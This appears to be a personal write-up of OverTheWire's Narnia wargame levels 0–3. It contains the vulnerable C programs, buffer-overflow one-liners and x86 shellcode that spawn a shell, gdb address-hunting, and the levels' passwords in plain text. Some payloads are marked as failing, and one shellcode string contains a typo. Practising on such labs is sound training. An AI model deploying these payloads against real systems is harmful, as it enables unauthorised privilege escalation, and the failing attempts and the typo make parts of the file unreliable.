.____              .___.__                                       .___
|    |    __ __  __| _/|__| ____________   ____  ______ ____   __| _/
|    |   |  |  \/ __ | |  |/  ___/\____ \ /  _ \/  ___// __ \ / __ | 
|    |___|  |  / /_/ | |  |\___ \ |  |_> >  <_> )___ \\  ___// /_/ | 
|_______ \____/\____ | |__/____  >|   __/ \____/____  >\___  >____ | 
        \/          \/         \/ |__|              \/     \/     \/ 

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$ cd C:\Program Files\PuTTY                                                    $$
$$ putty.exe $ssh [level]@narnia.labs.overthewire.org -P 2226 -pw [password]    $$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


** Commands **
$$$$$$$$$$$$$$
$$$ 000000 $$$
$$$$$$$$$$$$$$

cd ../../
cd narnia
cat narnia0

------------------------------------------------------------------
int main(){
        long val=0x41414141;
        char buf[20];

        printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
        printf("Here is your chance: ");
        scanf("%24s",&buf);

        printf("buf: %s\n",buf);
        printf("val: 0x%08x\n",val);

        if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());
                system("/bin/sh");
    }
        else {
                printf("WAY OFF!!!!\n");
                exit(1);
        }

        return 0;
}
-------------------------------------------------------------------

# Buffer is 20 chars long
# We need to put in deadbeef

perl -e 'print "a" x 20 . "\xde\xad\xbe\xef"'; | ./narnia0
# deadbeef is all scrambled

perl -e 'print "a" x 20 . "\xef\xbe\xad\xde"' | ./narnia0
# Need something to keep the shell open

(perl -e 'print "a" x 20 . "\xef\xbe\xad\xde"'; cat ) | ./narnia0
whoami
-- narnia1
cat /etc/narnia_pass/narnia1

$$$$$$$$$$$$$$
$$$ 111111 $$$
$$$$$$$$$$$$$$

cd ../../
cd narnia
cat narnia1.c

-----------------------------------------------------------------------------------
#include <stdio.h>

int main(){
        int (*ret)();

        if(getenv("EGG")==NULL){
                printf("Give me something to execute at the env-variable EGG\n");
                exit(1);
        }

        printf("Trying to execute EGG!\n");
        ret = getenv("EGG");
        ret();

        return 0;
}
------------------------------------------------------------------------------------

export EGG=$(perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"')
./narnia1

whoami
-- narnia2
cat /etc/narnia_pass_narnia2

$$$$$$$$$$$$$$
$$$ 222222 $$$
$$$$$$$$$$$$$$

cd ../../
cd narnia
cat narnia2.c

-----------------------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char * argv[]){
        char buf[128];

        if(argc == 1){
                printf("Usage: %s argument\n", argv[0]);
                exit(1);
        }
        strcpy(buf,argv[1]);
        printf("%s", buf);

        return 0;
}

-----------------------------------------------------------------------------------------

# LUDISPOSED
# Get the lenght of the shellcode
perl -e 'print length("\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89e3\x52\x51\x53\x89\xe1\xcd\x80") . "\n"'
-- 33

# So 140 - 33 = 107
# We need a filler of 107 + shellcode + the memory location we are writing to
# To find out the mem location let's use gdb :)

gdb ./narnia2

# TESTINGS
# DIFFERENT SHELLCODES:
23: "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
28: "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
37: "\x31\xf6\xf7\xe6\x52\x52\x52\x54\x5b\x53\x5f\xc7\x07\x2f\x62\x69\x6e\xc7\x47\x04\x2f\x2f\x73\x68\x40\x75\x04\xb0\x3b\x0f\x05\x31\xc9\xb0\x0b\xcd\x80"
39: "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

# INCORRECT SHELLCODE
r `perl -e 'print "\x90" x 107 . "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89e3\x52\x51\x53\x89\xe1\xcd\x80" . "\x80\xd5\xff\xff"'`
r `perl -e 'print "\x90" x 107 . "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89e3\x52\x51\x53\x89\xe1\xcd\x80" . "\xef\xbe\xad\xde"'`

# Padding is important :)
# WORKS!
r `perl -e 'print "\x90" x 55 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" . "\x90" x 57 . "\xaa\xaa\xaa\xaa"'`
r `perl -e 'print "\x90" x 55 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" . "\x90" x 57 . "\x40\xd5\xff\xff"'`

# DUAL UNIX SHELL (x32|x68) WORKS!
r `perl -e 'print "\x90" x 50 . "\x31\xf6\xf7\xe6\x52\x52\x52\x54\x5b\x53\x5f\xc7\x07\x2f\x62\x69\x6e\xc7\x47\x04\x2f\x2f\x73\x68\x40\x75\x04\xb0\x3b\x0f\x05\x31\xc9\xb0\x0b\xcd\x80" . "\x90" x 53 . "\xaa\xaa\xaa\xaa"'`
r `perl -e 'print "\x90" x 50 . "\x31\xf6\xf7\xe6\x52\x52\x52\x54\x5b\x53\x5f\xc7\x07\x2f\x62\x69\x6e\xc7\x47\x04\x2f\x2f\x73\x68\x40\x75\x04\xb0\x3b\x0f\x05\x31\xc9\xb0\x0b\xcd\x80" . "\x90" x 53 . "\x40\xd5\xff\xff"'`

x/40xw $esp-144

-----------------------------------------------------------------------------------------------------------------------------------------
ls -l narnia2
-r-sr-x--- 1 narnia3 narnia2 5164 Nov  9 15:08 narnia2

Yet no privilige...
$whoami
narnia2 <----? WTF

# ARIES

r $(perl -e 'print "a" x 107 . "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89e3\x52\x51\x53\x89\xe1\xcd\x80" . "c" x 4')
x/300x $esp
quit

./narnia2 $(perl -e 'print "a" x 107 . "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89e3\x52\x51\x53\x89\xe1\xcd\x80" . "\x90\xd8\xff\xff"')
Segmentation fault (core dumped)

cat getenvaddr.c

-----------------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[]){
        char *ptr;
        ptr=getenv(argv[1]);
        ptr+=(strlen(argv[0])-strlen(argv[2]))*2;
        printf("%s will be at %p\n",argv[1],ptr);
        return 0;
}

-----------------------------------------------------------------------------------------

narnia2@narnia:/tmp/aries$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')  
narnia2@narnia:/tmp/aries$ touch getenvaddr.c                
narnia2@narnia:/tmp/aries$ nano getenvaddr.c
narnia2@narnia:/tmp/aries$ gcc getenvaddr.c -o getenvaddr -m32
narnia2@narnia:/tmp/aries$ ./getenvaddr.c EGG /narnia/narnia2 
0xffffd87e
narnia2@narnia:/tmp/aries$ /narnia/narnia2 $(python -c 'print "U"*140 + "\x7e\xd8\xff\xff"')
$ whoami
narnia2
# still not work...


$$$$$$$$$$$$$$
$$$ 333333 $$$
$$$$$$$$$$$$$$

cd ../../
cd narnia
cat narnia3.c

-----------------------------------------------------------------------------------------

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h> 

int main(int argc, char **argv){
 
        int  ifd,  ofd;
        char ofile[16] = "/dev/null";
        char ifile[32];
        char buf[32];
 
        if(argc != 2){
                printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]);
                exit(-1);
        }
 
        /* open files */
        strcpy(ifile, argv[1]);
        if((ofd = open(ofile,O_RDWR)) < 0 ){
                printf("error opening %s\n", ofile);
                exit(-1);
        }
        if((ifd = open(ifile, O_RDONLY)) < 0 ){
                printf("error opening %s\n", ifile);
                exit(-1);
        }
 
        /* copy from file1 to file2 */
        read(ifd, buf, sizeof(buf)-1);
        write(ofd,buf, sizeof(buf)-1);
        printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);
 
        /* close 'em */
        close(ifd);
        close(ofd);
 
        exit(1);
}

** Passwords **
narnia0:narnia0
narnia1:efeidiedae
narnia2:nairiepecu
narnia3:vaequeezee
